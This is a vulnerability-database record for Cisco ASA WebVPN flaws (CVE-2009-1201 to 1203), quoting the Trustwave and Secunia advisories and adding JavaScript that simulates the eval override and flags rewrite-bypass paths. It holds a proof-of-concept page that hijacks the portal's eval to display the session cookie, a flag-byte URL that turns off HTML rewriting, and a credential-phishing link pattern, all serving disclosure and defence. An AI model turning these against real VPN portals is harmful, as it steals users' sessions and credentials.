ID

VAR-200906-0069


CVE

CVE-2009-1202


TITLE

Cisco Adaptive Security Appliances (ASA) Device WebVPN Vulnerable to cross-site scripting

Trust: 0.8

sources: JVNDB: JVNDB-2009-001870

DESCRIPTION

WebVPN on the Cisco Adaptive Security Appliances (ASA) device with software 8.0(4), 8.1.2, and 8.2.1 allows remote attackers to bypass certain protection mechanisms involving URL rewriting and HTML rewriting, and conduct cross-site scripting (XSS) attacks, by modifying the first hex-encoded character in a /+CSCO+ URI, aka Bug ID CSCsy80705.

Cisco ASA is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass HTML rewrite rules. Successfully exploiting this issue will aid in cross-site scripting attacks. This issue is documented by Cisco Bug ID CSCsy80705. Cisco ASA 8.0(4), 8.1.2, and 8.2.1 are vulnerable.

Trustwave's SpiderLabs Security Advisory TWSL2009-002: Cisco ASA Web VPN Multiple Vulnerabilities

Published: 2009-06-24
Version: 1.0
Vendor: Cisco Systems, Inc. (http://www.cisco.com)
Versions affected: 8.0(4), 8.1.2, and 8.2.1

Description:
Cisco's Adaptive Security Appliance (ASA) provides a number of security-related features, including "Web VPN" functionality that allows authenticated users to access a variety of content through a web interface. This includes other web content, FTP servers, and CIFS file servers. The web content is proxied by the ASA and rewritten so that any URLs in the web content are passed as query parameters sent to the ASA web interface. Where scripting content is present, the ASA places a JavaScript wrapper around the original webpage's Document Object Model (DOM) to prevent the webpage from accessing the ASA's DOM.

For example, the "csco_wrap_js" JavaScript function in /+CSCOL+/cte.js makes a call to a function referenced by "CSCO_WebVPN['process']". The result of this call is then used in an "eval" statement.

function csco_wrap_js(str) {
    // Ghost script tags that reload the portal's own helper scripts
    var ret = "<script id=CSCO_GHOST src=" + CSCO_Gateway +
              "/+CSCOL+/cte.js></scr" + "ipt><script id=CSCO_GHOST src=" +
              CSCO_Gateway + "/+CSCOE+/apcf></sc" + "ript>";
    // 'process' is looked up on a global object the proxied page can overwrite
    var js_mangled = CSCO_WebVPN['process']('js', str);
    // whatever that function returned is evaluated in the portal's context
    ret += CSCO_WebVPN['process']('html', eval(js_mangled));
    return ret;
};

To exploit this behavior, a malicious page can rewrite "CSCO_WebVPN['process']" with an attacker-defined function that will return an arbitrary value. The next time the "csco_wrap_js" function is called, the malicious code will be executed. Below is a proof of concept.

<html><script>
// Replacement for CSCO_WebVPN['process']: the string it returns is
// passed to eval() by csco_wrap_js, in the portal's DOM
function a(b, c) {
    return "alert('Your VPN location:\\n\\n'+" +
           "document.location+'\\n\\n\\n\\n\\n" +
           "Your VPN cookie:\\n\\n'+document.cookie);";
}
CSCO_WebVPN['process'] = a;
csco_wrap_js('');   // trigger the wrapper; the alert shows the portal's cookie
</script></html>

Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34 and 8.1.2.25.

CVSS Score:
AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C
Base: 4.3 Temporal: 3.9

Finding 2: HTML Rewriting Bypass
CVE: CVE-2009-1202

When a webpage is requested through the ASA's Web VPN, the targeted scheme and hostname is Rot13-encoded, then hex-encoded and placed in the ASA's URL. For example, "https://www.trustwave.com" is accessed by requesting the following ASA path:

/+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A++/

The HTML content of this request is obviously reformatted by the ASA, starting at the very beginning:

<script id='CSCO_GHOST' src="/+webvpn+/toolbar.js">

However, if the request URL is modified to change the initial hex value of "00" to "01", the HTML document is returned without any rewriting. This allows the page's scriptable content to run in the ASA's DOM, making cross-site scripting trivial.

Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34 and 8.1.2.25.

CVSS Score:
AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C
Base: 4.3 Temporal: 3.9

Finding 3: Authentication Credential Theft
CVE: CVE-2009-1203

When a user accesses an FTP or CIFS destination using the Web VPN, the resulting URL is formatted in a similar manner to the web requests described above. The following URL attempts to connect to ftp.example.com; normally, it would be in an HTML frame within the Web VPN website.

/+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F7367632e726b6e7a6379722e70627a

The ASA first attempts to connect to the FTP server or CIFS share using anonymous credentials. If those fail, the user is prompted for login credentials. When viewed on its own (outside of a frame), the submission form gives no indication what it is for and is very similar in appearance to the Web VPN's primary login page. If the URL was sent to a user by an attacker, it is very possible that a user would assume that he needs to resubmit credentials to the Web VPN. The ASA would then forward the credentials to the attacker's FTP or CIFS server.

Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34 and 8.1.2.25.

CVSS Score:
AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C
Base: 4.3 Temporal: 3.9

Vendor Communication Timeline:
03/31/09 - Cisco notified of vulnerabilities
06/24/09 - Cisco software updates released; Advisory released

Remediation Steps:
Install updated software from Cisco.

Revision History:
1.0 Initial publication

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations, ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers, manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com

About Trustwave's SpiderLabs:
SpiderLabs is the advanced security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

----------------------------------------------------------------------

TITLE: Cisco ASA WebVPN Multiple Vulnerabilities

SECUNIA ADVISORY ID: SA35511

VERIFY ADVISORY: http://secunia.com/advisories/35511/

DESCRIPTION:
Some vulnerabilities and a security issue have been reported in Cisco Adaptive Security Appliance (ASA), which can be exploited by malicious people to conduct cross-site scripting and spoofing attacks.

1) Input passed within web pages is not properly sanitised before being used in a call to eval() in context of the VPN web portal. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of the WebVPN.

This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of the VPN web portal.

3) A security issue exists in the handling of Common Internet File System (CIFS) and FTP shares in the SSL VPN feature. This can be exploited to conduct spoofing attacks and potentially disclose the user's credentials if a user follows a specially crafted link.

The vulnerabilities are reported in versions prior to 8.0.4(34), 8.1.2(25), and 8.2.1(3) that are configured to accept Clientless SSL VPN connections.

SOLUTION:
Update to version 8.0.4(34), 8.1.2(25), or 8.2.1(3).
http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT

PROVIDED AND/OR DISCOVERED BY:
David Byrne, Trustwave's SpiderLabs

ORIGINAL ADVISORY:
Cisco:
http://tools.cisco.com/security/center/viewAlert.x?alertId=18373
http://tools.cisco.com/security/center/viewAlert.x?alertId=18442
http://tools.cisco.com/security/center/viewAlert.x?alertId=18536

Trustwave:
https://www.trustwave.com/spiderlabs/advisories/TWSL2009-002.txt

----------------------------------------------------------------------
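The override described in the first Trustwave finding (CVE-2009-1201), modelled as an added example that is not code from the advisory or from the appliance: a trusted "process" function, a wrapper that looks it up on a shared writable object and evals the result (the csco_wrap_js shape), the proof-of-concept's reassignment run against it, and a hardened wrapper that binds the function once and freezes the namespace. PORTAL_COOKIE, trustedProcess, runAttackerPage and the hardened variant are assumptions made for this demonstration; the hardened variant covers only the reassignment the PoC uses and is not the vendor's fix.

```javascript
'use strict';
// Added simulation of the control flow in Finding 1 (CVE-2009-1201). This is
// a model written for this page, not the ASA's /+CSCOL+/cte.js: the names
// CSCO_WebVPN and csco_wrap_js are kept, everything else is constructed.

// Stand-in for data that lives in the portal's DOM (e.g. document.cookie).
const PORTAL_COOKIE = 'webvpn=SESSION-TOKEN-EXAMPLE'; // constructed sample value

// Stand-in for the portal's own "process" step. The real one mangles proxied
// JavaScript/HTML; this one just wraps its input so the effect is visible.
function trustedProcess(kind, str) {
  return kind === 'js' ? JSON.stringify('[mangled]' + str) : '<!--' + str + '-->';
}

// Vulnerable shape: the wrapper looks CSCO_WebVPN['process'] up at call time
// on an object the proxied page can write to, and evals whatever comes back.
function makeVulnerablePortal() {
  const CSCO_WebVPN = { process: trustedProcess };
  function csco_wrap_js(str) {
    const js_mangled = CSCO_WebVPN['process']('js', str);
    // direct eval runs in this scope, so a returned string can read PORTAL_COOKIE
    return CSCO_WebVPN['process']('html', eval(js_mangled));
  }
  return { CSCO_WebVPN, csco_wrap_js };
}

// Hardened shape (illustrative, not the vendor's fix): bind the trusted
// function once at load time and freeze the namespace, so a later assignment
// from the proxied page neither changes what the wrapper calls nor succeeds.
function makeHardenedPortal() {
  const CSCO_WebVPN = Object.freeze({ process: trustedProcess });
  const boundProcess = CSCO_WebVPN.process;
  function csco_wrap_js(str) {
    const js_mangled = boundProcess('js', str);
    return boundProcess('html', eval(js_mangled));
  }
  return { CSCO_WebVPN, csco_wrap_js };
}

// What the advisory's proof of concept does: replace 'process' with a function
// that returns attacker-chosen source, then trigger the wrapper. Here the
// payload evaluates to the portal cookie instead of calling alert().
function runAttackerPage(portal) {
  const evil = (kind, str) => (kind === 'js' ? 'PORTAL_COOKIE' : str);
  let overrideSucceeded = true;
  try {
    portal.CSCO_WebVPN['process'] = evil;
  } catch (e) {
    overrideSucceeded = false; // frozen object: TypeError in strict mode
  }
  // in sloppy mode a frozen write fails silently, so check identity as well
  overrideSucceeded = overrideSucceeded && portal.CSCO_WebVPN['process'] === evil;
  return { overrideSucceeded, output: portal.csco_wrap_js('') };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable:', runAttackerPage(makeVulnerablePortal()));
  console.log('hardened  :', runAttackerPage(makeHardenedPortal()));
}
```

Run it with node: the vulnerable portal hands back the cookie stand-in because eval executes attacker-chosen source inside the wrapper's scope, while the hardened portal returns only the processed markup. A page that shares the portal's origin has other routes to its DOM than this one assignment, so freezing the namespace narrows the bug rather than removing the trust problem; keeping proxied content out of the portal's origin is the structural answer.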
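The /+CSCO+ path format from Finding 2 and the files/browse.html path parameter from Finding 3, as an added example rather than Cisco's code: rot13 plus hex encoding, a decoder, and a check that flags requests whose leading flag byte is not 00. Decoding the path quoted in the Trustwave advisory yields https://www.trustwave.com (its first five bytes are "uggcf", the rot13 of "https"), and the browse.html hex decodes to ftp.example.com. The sample paths are constructed, and isRewriteBypassAttempt is an illustrative log rule assumed for this example, not a documented appliance behaviour.

```javascript
'use strict';
// Added example for Findings 2 and 3: encoder/decoder for the /+CSCO+<hex>++/
// path form and the files/browse.html path parameter, plus a request check
// on the flag byte. Written for this page, not Cisco's code; the layout
// (one flag byte, then rot13 of "scheme://host" hex-encoded) is taken from
// the advisory, and isRewriteBypassAttempt is an illustrative log/WAF rule.

function rot13(s) {
  return s.replace(/[a-zA-Z]/g, (c) => {
    const base = c <= 'Z' ? 65 : 97;
    return String.fromCharCode(((c.charCodeAt(0) - base + 13) % 26) + base);
  });
}

function hexEncode(s) {
  return Array.from(s, (c) =>
    c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');
}

function hexDecode(h) {
  if (h.length % 2 !== 0 || /[^0-9a-fA-F]/.test(h)) throw new Error('bad hex: ' + h);
  let out = '';
  for (let i = 0; i < h.length; i += 2) {
    out += String.fromCharCode(parseInt(h.slice(i, i + 2), 16));
  }
  return out;
}

// The portal emits flag '00'; the advisory reports that '01' returned the
// origin page without rewriting.
function encodeCscoPath(target, flag = '00') {
  return '/+CSCO+' + flag + hexEncode(rot13(target)) + '++/';
}

function decodeCscoPath(path) {
  const m = /^\/\+CSCO\+([0-9A-Fa-f]{2})([0-9A-Fa-f]*)\+\+\//.exec(path);
  if (!m) return null;
  return { flag: m[1].toUpperCase(), target: rot13(hexDecode(m[2])) };
}

// Finding 3: browse.html keeps the scheme in clear and hex-encodes only the
// rot13'd host, e.g. path=ftp%3A%2F%2F<hex>. Takes the query string.
function decodeBrowseTarget(query) {
  const raw = new URLSearchParams(query).get('path');
  const m = raw && /^([a-z]+):\/\/([0-9A-Fa-f]+)$/.exec(raw);
  if (!m) return null;
  return m[1] + '://' + rot13(hexDecode(m[2]));
}

// Detection (assumed rule): a /+CSCO+ request whose flag byte is anything but
// 00 is not something the portal generates, so flag it for review.
function isRewriteBypassAttempt(path) {
  const d = decodeCscoPath(path);
  return d !== null && d.flag !== '00';
}

// Constructed sample of access-log paths (not captured traffic): the normal
// form, the same target with the flag byte set to 01, and a browse.html hit.
const SAMPLE_PATHS = [
  '/+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A++/',
  '/+CSCO+0175676763663A2F2F6A6A6A2E67656866676A6E69722E70627A++/',
  '/+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F7367632e726b6e7a6379722e70627a',
];

function reviewSamplePaths() {
  return SAMPLE_PATHS.filter(isRewriteBypassAttempt);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(encodeCscoPath('https://www.trustwave.com'));
  console.log(decodeCscoPath(SAMPLE_PATHS[0]));
  console.log(decodeBrowseTarget(SAMPLE_PATHS[2].split('?')[1]));
  console.log('flagged:', reviewSamplePaths());
}
```

The encoder is only there so the decoder can be checked against the advisory's own string; the useful piece for operations is the flag-byte check, which works on raw access-log paths and does not need the target decoded. Anything other than 00 in that position on an unpatched build should be treated as a rewriting-bypass attempt against whoever follows the link.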

Trust: 2.16

sources: NVD: CVE-2009-1202 // JVNDB: JVNDB-2009-001870 // BID: 35480 // VULHUB: VHN-38648 // PACKETSTORM: 78639 // PACKETSTORM: 78856

AFFECTED PRODUCTS

vendor: cisco, model: adaptive security appliance, scope: eq, version: 8.2.1

Trust: 2.7

vendor: cisco, model: adaptive security appliance, scope: eq, version: 8.1.2

Trust: 2.7

vendor: cisco, model: adaptive security appliance, scope: eq, version: 8.0(4)

Trust: 1.6

vendor: cisco, model: adaptive security appliance, scope: eq, version: 8.0(4)

Trust: 1.1

vendor: cisco, model: adaptive security appliance, scope: eq, version: *

Trust: 1.0

vendor: cisco, model: adaptive security appliance, scope: eq, version: 0

Trust: 0.3

vendor: cisco, model: adaptive security appliance, scope: ne, version: 8.2.13

Trust: 0.3

vendor: cisco, model: adaptive security appliance, scope: ne, version: 8.1.2.25

Trust: 0.3

vendor: cisco, model: adaptive security appliance, scope: ne, version: 8.0.4.34

Trust: 0.3

sources: BID: 35480 // JVNDB: JVNDB-2009-001870 // CNNVD: CNNVD-200906-387 // NVD: CVE-2009-1202

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2009-1202
value: MEDIUM

Trust: 1.0

NVD: CVE-2009-1202
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-200906-387
value: MEDIUM

Trust: 0.6

VULHUB: VHN-38648
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2009-1202
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-38648
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-38648 // JVNDB: JVNDB-2009-001870 // CNNVD: CNNVD-200906-387 // NVD: CVE-2009-1202

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-38648 // JVNDB: JVNDB-2009-001870 // NVD: CVE-2009-1202

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-200906-387

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 78639 // CNNVD: CNNVD-200906-387

CONFIGURATIONS

sources: JVNDB: JVNDB-2009-001870

PATCH

title: 18442, url: http://tools.cisco.com/security/center/viewAlert.x?alertId=18442

Trust: 0.8

sources: JVNDB: JVNDB-2009-001870

EXTERNAL IDS

db: NVD, id: CVE-2009-1202

Trust: 2.9

db: BID, id: 35480

Trust: 2.8

db: SECUNIA, id: 35511

Trust: 1.2

db: SECTRACK, id: 1022457

Trust: 1.1

db: VUPEN, id: ADV-2009-1713

Trust: 1.1

db: JVNDB, id: JVNDB-2009-001870

Trust: 0.8

db: BUGTRAQ, id: 20090624 TRUSTWAVE'S SPIDERLABS SECURITY ADVISORY TWSL2009-002

Trust: 0.6

db: CNNVD, id: CNNVD-200906-387

Trust: 0.6

db: VULHUB, id: VHN-38648

Trust: 0.1

db: PACKETSTORM, id: 78639

Trust: 0.1

db: PACKETSTORM, id: 78856

Trust: 0.1

sources: VULHUB: VHN-38648 // BID: 35480 // JVNDB: JVNDB-2009-001870 // PACKETSTORM: 78639 // PACKETSTORM: 78856 // CNNVD: CNNVD-200906-387 // NVD: CVE-2009-1202

REFERENCES

url:http://www.securityfocus.com/bid/35480

Trust: 2.5

url:http://www.securityfocus.com/archive/1/504516/100/0/threaded

Trust: 1.1

url:http://www.securitytracker.com/id?1022457

Trust: 1.1

url:http://secunia.com/advisories/35511

Trust: 1.1

url:http://www.vupen.com/english/advisories/2009/1713

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1202

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-1202

Trust: 0.8

url:http://www.securityfocus.com/archive/1/archive/1/504516/100/0/threaded

Trust: 0.6

url:http://tools.cisco.com/security/center/viewalert.x?alertid=18442

Trust: 0.4

url:http://www.cisco.com/en/us/products/ps6120/index.html

Trust: 0.3

url:/archive/1/504516

Trust: 0.3

url:http://www.cisco.com/pcgi-bin/tablebuild.pl/asapsirt

Trust: 0.2

url:http://www.trustwave.com

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2009-1202

Trust: 0.1

url:https://www.trustwave.com/spiderlabs

Trust: 0.1

url:http://secunia.com/

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2009-1203

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2009-1201

Trust: 0.1

url:http://www.cisco.com/security

Trust: 0.1

url:http://lists.grok.org.uk/full-disclosure-charter.html

Trust: 0.1

url:http://www.cisco.com

Trust: 0.1

url:https://www.trustwave.com

Trust: 0.1

url:https://www.trustwave.com/spiderlabs/advisories/twsl2009-002.txt

Trust: 0.1

url:http://tools.cisco.com/security/center/viewalert.x?alertid=18536

Trust: 0.1

url:http://secunia.com/advisories/secunia_security_advisories/

Trust: 0.1

url:http://secunia.com/advisories/business_solutions/

Trust: 0.1

url:http://secunia.com/advisories/35511/

Trust: 0.1

url:http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

Trust: 0.1

url:http://tools.cisco.com/security/center/viewalert.x?alertid=18373

Trust: 0.1

url:http://secunia.com/advisories/about_secunia_advisories/

Trust: 0.1

sources: VULHUB: VHN-38648 // BID: 35480 // JVNDB: JVNDB-2009-001870 // PACKETSTORM: 78639 // PACKETSTORM: 78856 // CNNVD: CNNVD-200906-387 // NVD: CVE-2009-1202

CREDITS

David Byrne davidribyrne@yahoo.com

Trust: 0.6

sources: CNNVD: CNNVD-200906-387

SOURCES

db: VULHUB, id: VHN-38648
db: BID, id: 35480
db: JVNDB, id: JVNDB-2009-001870
db: PACKETSTORM, id: 78639
db: PACKETSTORM, id: 78856
db: CNNVD, id: CNNVD-200906-387
db: NVD, id: CVE-2009-1202

LAST UPDATE DATE

2024-11-23T22:43:03.300000+00:00


SOURCES UPDATE DATE

db: VULHUB, id: VHN-38648, date: 2018-10-10T00:00:00
db: BID, id: 35480, date: 2009-06-26T13:59:00
db: JVNDB, id: JVNDB-2009-001870, date: 2009-08-12T00:00:00
db: CNNVD, id: CNNVD-200906-387, date: 2009-06-25T00:00:00
db: NVD, id: CVE-2009-1202, date: 2024-11-21T01:01:53.980

SOURCES RELEASE DATE

db: VULHUB, id: VHN-38648, date: 2009-06-25T00:00:00
db: BID, id: 35480, date: 2009-06-24T00:00:00
db: JVNDB, id: JVNDB-2009-001870, date: 2009-08-12T00:00:00
db: PACKETSTORM, id: 78639, date: 2009-06-25T00:37:57
db: PACKETSTORM, id: 78856, date: 2009-07-01T09:39:17
db: CNNVD, id: CNNVD-200906-387, date: 2009-06-25T00:00:00
db: NVD, id: CVE-2009-1202, date: 2009-06-25T17:30:00.250